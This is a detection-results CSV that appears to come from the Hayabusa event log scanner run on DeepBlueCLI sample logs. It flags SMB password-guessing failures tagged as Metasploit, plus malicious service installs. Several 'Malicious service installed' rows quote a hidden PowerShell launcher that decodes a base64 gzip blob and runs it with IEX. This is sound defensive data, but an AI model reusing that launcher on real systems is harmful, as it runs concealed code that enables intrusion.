SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pX1ztnCKiePrPbTT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3XQcfMHJDsBtJDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhRsRIS5tHKLv2oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JmkLhptugDU2fDWp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2yk62yREbgDCj9pB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6JPvkmaAsJlwn9t3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lhciP1zM9njlRI3j : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: duNDenwdo1oHVuoL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0ChBZOYkTm1SguA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RU38tuiKC0weexmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jg0Hp4xtz0pAMhCz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AorVNz5MgTeEvn2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oJ6tVjBxlYyj5ej : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: oEAEOi0TsSRVPlz4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: USfEwKkH8OUADVds : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y0jg1i6tDiInd10i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv2jRzrgoP6lJdAJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LmuAXUwSkhR3tSRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zy4Fkpvcrlmp9AES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 51ipUXvrRh0CPH1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TB15XKzVJwIyjqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i1F6muFPBlPyHPbR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XNXwYS73RElHozUo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ft1MLPJISeq0bMsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8kbFOwQiCyRVMDV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ToPzuDEmXN1fjIcS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pKF1QKEuTXIGnrx2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fyHpo6pX8TEo6ttv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uYqEt90yr8B3rK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LKkrM0slVn0CKHw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyJ82cfaddnc8c6D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KJRw0S82SupmuS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4lSo9BMWdcPLfLb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: XreSLg472qhJw0R3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIJcQJKLmnjrE2T9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlddo3GCTEIkFyi9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hxiZoB5mHR2tGUFM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fpEbpiox2Q3Qf8av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: zIGuwymOgHZnXZPm : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:36:09.147 
+09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:36:09.237 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:36:09.334 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:36:10.592 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: DrzkXznQhkKgYssd : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:38:04.041 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:38:04.087 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:38:04.643 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: TDhDnlnsrKrQVnjY : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - 
